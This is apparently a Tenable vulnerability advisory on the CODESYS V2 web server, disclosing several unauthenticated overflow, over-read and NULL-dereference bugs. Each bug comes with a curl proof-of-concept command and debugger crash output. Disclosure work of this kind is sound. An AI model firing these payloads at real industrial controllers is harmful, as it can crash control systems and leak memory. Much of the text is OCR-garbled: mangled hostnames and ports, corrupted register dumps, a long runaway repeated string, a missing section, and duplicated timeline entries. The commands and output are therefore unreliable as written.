

# CODESYS V2 Web Server Multiple Vulnerabilities

Critical

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# **Synopsis**

#### 1) Buffer Overflow

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H

A buffer overflow condition exists when copying data from a 0x100-byte stack-based buffer to a heap-based communication buffer. The copy size is controlled by the attacker.

An unauthenticated remote attacker can exploit this vulnerability with the following CURL command:

```
curl -d '|1|6|0|co|<copy_size>|8|V0x1|<data>|' http://<codesys_v2_web_server>:8080/
```

When handling this message, the CODESYS V2 web server fills a 0x100-byte stack-based buffer with <data>, limiting the buffer to have up to 0x100 bytes of <data>. The server then copies <copy\_size> bytes from the stack-based buffer to a heap-based communication buffer. By default, the communication buffer has 0x3fff (16383) bytes but is configurable via the 'buffer-size' setting in the web server configuration file (webserver\_conf.xml).

A large attacker-controlled <copy\_size> can cause a buffer over-read on the stack-based buffer or a buffer over-write on the heap-based communication buffer, which can crash the web server or the CODESYS Control runtime system:

```
curl -d '|1|6|0|co|20000|8|v0x1|AAAAAAAA| 'http://ccodesys_v2_web_server>:8080/

8:000-5 g
(1000.1678): Access violation - code c00000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
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```

In addition, a large <copy\_size> can result in information disclosure as it leaks out stack contents to be traversed over the network if the web server is configured with an external CODESYS Control runtime system via the 'target-ip-address' setting in webserver\_conf.xml:

```
Curl -d '|1||6||0||Co||1800||8||vik1||AAAAAAA|' http://ccdexys_v2_web_servery:8088/

Mireshark captured TCP stream from the web server to an external CODEYS Control runtime system:

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```

# 2) Heap-based Buffer Over-read

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A heap-based buffer over-read/over-write condition exists when the web server performs an in-place XOR-based encoding of user-supplied data. The amount of data to encode is controlled by the attacker and can be larger than the actual size of the data:

An unauthenticated remote attacker can exploit this vulnerability with the following CURL command:

```
curl -d '|11|<filename.wtc|cxor_encode_len>|dbase64_encoded>|<starting_indx_of_the_xor_table>|' http://ccodesys_v2_web_server>:8888/
```

When handling this message, the CODESYS v2 web server does the following:

- Base64-decode <base64\_encoded> to a heap-based buffer
- Encode <xor\_encode\_len> bytes of the base64-decoded data using an XOR-based algorithm
- Write the XOR-encoded data to <webroot>/<filename>.wtc



```
memory check error at 8x81948864 = 8x2E, should be 6x7D.
memory check error at 8x81948865 = 8x4E, should be 6x7D.
memory check error at 8x81948865 = 8x1E, should be 6x7D.
memory check error at 8x81948867 = 8x2E, should be 6x7D.
(5278.ecs) Access violation - code 6x809808 (first chance)
First chance exceptions are reported before any exception handling.
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax-cled45c ebx-81948830 ecx-54571Bbf edx-81948070 esi=01948080 edi=01948080 epi=77097670 epo=8004274 epo=90042cas [opi—0] nv up ei pl zn nap en cs-6001b ss-8023 di=0021 es=8023 fs-803b gs=8000 efl=80018246
mov eax,dword ptr [eax] di=0232.cled465c=???????
7709767b7 8b00 mov eax,dword ptr [eax] di=0232.cled465c=???????
                                                                                                                                                              mov eax,dword ptr [eax] ds:0023:cled4d5c=???????
```

#### 3) Message | 9 NULL Pointer Dereference

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A NULL pointer dereference can occur when the web server processes a malformed message starting with 19:

An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:

```
curl -d '|9|0000' http://<codesys_v2_web_server>:8080/
```

#### 4) Message | 10 NULL Pointer Dereference

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A NULL pointer dereference can occur when the web server processes a malformed message starting with |10:

An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:

```
curl -d '|10|0' http://<codesys_v2_web_server>:8080/
```

# 5) Message |b or |e NULL Pointer Dereference

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A NULL pointer dereference can occur when the web server processes a malformed message starting with |b or |e.

```
.text:00403C8E
.text:00403C93
.text:00403C96
.text:00403C96
.text:00403C9C
.text:00403CA2
                   mov ecx, [ebp+var_84]
mov byte ptr [ecx], 0; NULL ptr write
```

An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:

```
curl -d '|b|11|22|33|44|55' http://<codesys_v2_web_server>:8080/
(lcc.6bB): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
****MANIMAG: Unable to verify checksum for C:VProgram Files\35 Software\CODE57S V2.3\Visu\webserver.exe
exceptions are considered exceptions of collection for collec
```



```
.text:08482075 mov eax, [ebp+p8MexNum] ; NULL ptr if the string in .text:08482075 ; the first argument of the .text:08482075 ; interiose to start .text:08482078 add .text:08482078 mov exceptional moves edx, byte ptr [ecx-1] ; NULL ptr read
```

An unauthenticated remote attacker can exploit this vulnerability to crash the web server or the CODESYS Control runtime system:

```
curl -d '|e|5|e|co|1000|8|abt|' http://ccodesys_v2_web_server>:8080/

(2640.259c): Access violation - code c00000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.

*** MANUNDS: Unable to verify checksus for C:VPogram Files\SS Software\CODESYS V2.3\Visu\webserver.exe
expositions are served-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-exception-excep
```

#### 7) Message |6 Invalid Memory Access DoS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

A memory read access violation can occur when the web server processes a message starting with |6:

The vulnerability is triggered when processing unexpected file contents as part of message handling. An unauthenticated remote attacker can leverage a path traversal in the file extension field of the message to force the server to process the contents of an arbitrary file on the local file system. This can crash the web server or the CODESYS Control runtime system:

Alternatively, the attacker can upload a .wtc file and force the web server to process the file contents:

```
curl -d 5'[3|file0.wtc|file_content\n|' http://ccodesys_v2_web_server:8888/

curl -d '[6|file|wtc|3|4|5|6|' http://ccodesys_v2_web_server:8888/

(lee0.1828): Access violation - code c0000085 (first chance)

First chance exceptions are reported before any exception handling.

This exception may be expected and handled.

This exception may be expected and handled.

First chance exceptions may be expected and handled.

First chance exception handled.

First
```

# Solution

Apply patch as per vendor recommendations.

#### **Additional References**

https://www.codesys.com/security/security-reports.html

## **Disclosure Timeline**

```
07/20/2021 - Vulnerabilities discovered
```

 $07\!/21\!/2021$  – Tenable discloses to vendor.

07/22/2021 - Vendor acknowledges report.

07/28/2021 - Vendor states that fixes are in progress, requests credit line, and states that preview version will be made available prior to release. Tenable acknowledges.

09/10/2021 - Tenable requests status update.

09/16/2021 - Vendor provides preview patch.

09/20/2021 - Tenable reviews preview patch.
09/21/2021 - Vendor asks if patch has been reviewed.

09/21/2021 - Vendor asks ii patch has been reviewed.

 $09/21/2021 - Tenable\ informs\ vendor\ that\ the\ fixes\ in\ the\ preview\ patch\ have\ been\ verified.$ 

 $09/23/2021\mbox{-}\mbox{Vendor}$  states that advisory will be made available once ready.

10/26/2021 - Vendor informs Tenable of advisory release.

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For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email advisories@tenable.com

## **Risk Information**



Tenable Advisory ID: TRA-2021-47 Credit: Tenable Research

CVSSv3 Base / Temporal Score: 9.8 / 8.8

Affected Products: All variants of the CODESYS runtime system prior version V1.1.9.22 are affected

Risk Factor: Critical

### **Advisory Timeline**

October 26, 2021 - Initial release.

#### FEATURED PRODUCTS

Tenable One Exposure Management Platform

Tenable.cs Cloud Security

Tenable.io Vulnerability Management

Tenable.io Web App Scanning

Tenable.asm External Attack Surface

Tenable.ad Active Directory

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